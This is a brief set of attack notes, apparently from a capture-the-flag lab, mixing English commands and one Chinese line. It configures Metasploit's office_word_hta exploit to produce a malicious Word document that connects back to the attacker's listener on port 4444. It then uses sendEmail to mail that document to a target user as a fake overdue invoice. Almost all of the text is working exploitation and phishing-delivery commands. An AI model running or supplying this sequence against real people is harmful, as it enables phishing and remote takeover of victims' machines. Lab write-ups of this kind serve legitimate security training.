msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > set lhost 10.10.14.17
msf > set lport 4444
msf > set srvhost 10.10.14.17
msf > run
向目标用户发送钓鱼邮件
sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are
overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v